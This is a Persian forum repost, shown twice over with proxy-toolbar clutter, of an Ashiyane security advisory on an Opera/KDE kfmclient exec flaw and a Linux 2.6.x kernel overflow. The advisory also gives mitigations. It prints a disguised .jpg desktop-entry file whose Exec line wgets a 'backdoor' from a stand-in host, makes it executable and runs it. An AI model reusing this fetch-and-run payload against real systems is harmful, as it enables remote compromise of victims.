iman_ebru
Active Member
Current URI: New Window [Up One Directory]
Include Form Remove Scripts Accept Cookies Show Images Show Referer
--------------------------------------------------------------------------------
در هفته گذشته دو حفره امنیتی در برنامه های Operaو همچنین Linux Kernel 2.6.x کشف شد که باگ اولی برای کلاینت های لینوکس خطرناک بود و حفره دوم برای سرویس دهنده های لینوکس. حفره ای که در مرورگرOpera کشف شد مربوط به سرویس kfmclient exec است.Opera ای که تحت لینوکس استفاده می شود به صورت پیش فرض از سرویس kfmclient برایSave کردن فایل ها استفاده می کند. به موجب این آسیب پذیری هکر می تواند به صورت Remote دستورات دلخواه خود را به صورتShell بر روی سیستم هدف اجرا نماید. در حقیقت دستور kfmclient exec می تواند برای باز کردن یک صفحهKDE Desktop استفاده شود و به همین منظور دستورات را از میان "Exec=" اجرا کند. در زیر نمونه ای از فایل پیکربندیKDE نشان داده شده است.
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="هر دستور اختیاری"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
طریقهExploit کردن این باگ نیز به این صورت هست که هکر با ساختن یک فایلJpg باSource زیر و قرار دادن آن در یک هاست و لینک دادن به قربانی می تواند دستورات و فایل های اجرایی را بر روی سیستم هدف خود اجرا نماید.Source فایلJpg باید به صورت زیر باشد:
--------image.Jpg----------
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
---- end of image.Jpg-------
در این صورت اگر قربانی از مرورگرOpera تحت لینوکس استفاده کند فایلbackdoor هکر بر روی سیستم آن دانلود و اجرا می شود. این حفره بر روی نسخه لینوکس Opera 7.54 با Kde 3.2.3 تست شده و جواب مثبت داده است.
تیم امنیتی آشیانه سفارش می کند برای در امان ماندن از خطر امنیتی این حفره "kfmclient exec" را به صورت پیش فرضDisable و غیر فعال کنید.
حفره ای هم که در لینوکسKernel کشف شده بسیار خطرناک هست و هکر می تواند توسطExploit کردن فانکیشن های "sys32_ni_syscall" و "sys32_vm86_warning" درKernel 2.6.x باعث سرریز بافر در سیستم هدف شود. راه در امان ماندن از این باگ نیز اجازه دادن برای دسترسی به تنها کاربران قابل اطمینان و trust در سیستم های Kernel 2.6.x و یاUpgrade کردنKernel به آخرین نسخه ارائه شده هست. موفق باشید.
بهروز کمالیان
گروه امنیتی آشیانه
http://www.ashiyane.com/News/2bugs.htm
Include Form Remove Scripts Accept Cookies Show Images Show Referer
--------------------------------------------------------------------------------
در هفته گذشته دو حفره امنیتی در برنامه های Operaو همچنین Linux Kernel 2.6.x کشف شد که باگ اولی برای کلاینت های لینوکس خطرناک بود و حفره دوم برای سرویس دهنده های لینوکس. حفره ای که در مرورگرOpera کشف شد مربوط به سرویس kfmclient exec است.Opera ای که تحت لینوکس استفاده می شود به صورت پیش فرض از سرویس kfmclient برایSave کردن فایل ها استفاده می کند. به موجب این آسیب پذیری هکر می تواند به صورت Remote دستورات دلخواه خود را به صورتShell بر روی سیستم هدف اجرا نماید. در حقیقت دستور kfmclient exec می تواند برای باز کردن یک صفحهKDE Desktop استفاده شود و به همین منظور دستورات را از میان "Exec=" اجرا کند. در زیر نمونه ای از فایل پیکربندیKDE نشان داده شده است.
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="هر دستور اختیاری"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
طریقهExploit کردن این باگ نیز به این صورت هست که هکر با ساختن یک فایلJpg باSource زیر و قرار دادن آن در یک هاست و لینک دادن به قربانی می تواند دستورات و فایل های اجرایی را بر روی سیستم هدف خود اجرا نماید.Source فایلJpg باید به صورت زیر باشد:
--------image.Jpg----------
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
---- end of image.Jpg-------
در این صورت اگر قربانی از مرورگرOpera تحت لینوکس استفاده کند فایلbackdoor هکر بر روی سیستم آن دانلود و اجرا می شود. این حفره بر روی نسخه لینوکس Opera 7.54 با Kde 3.2.3 تست شده و جواب مثبت داده است.
تیم امنیتی آشیانه سفارش می کند برای در امان ماندن از خطر امنیتی این حفره "kfmclient exec" را به صورت پیش فرضDisable و غیر فعال کنید.
حفره ای هم که در لینوکسKernel کشف شده بسیار خطرناک هست و هکر می تواند توسطExploit کردن فانکیشن های "sys32_ni_syscall" و "sys32_vm86_warning" درKernel 2.6.x باعث سرریز بافر در سیستم هدف شود. راه در امان ماندن از این باگ نیز اجازه دادن برای دسترسی به تنها کاربران قابل اطمینان و trust در سیستم های Kernel 2.6.x و یاUpgrade کردنKernel به آخرین نسخه ارائه شده هست. موفق باشید.
بهروز کمالیان
گروه امنیتی آشیانه
http://www.ashiyane.com/News/2bugs.htm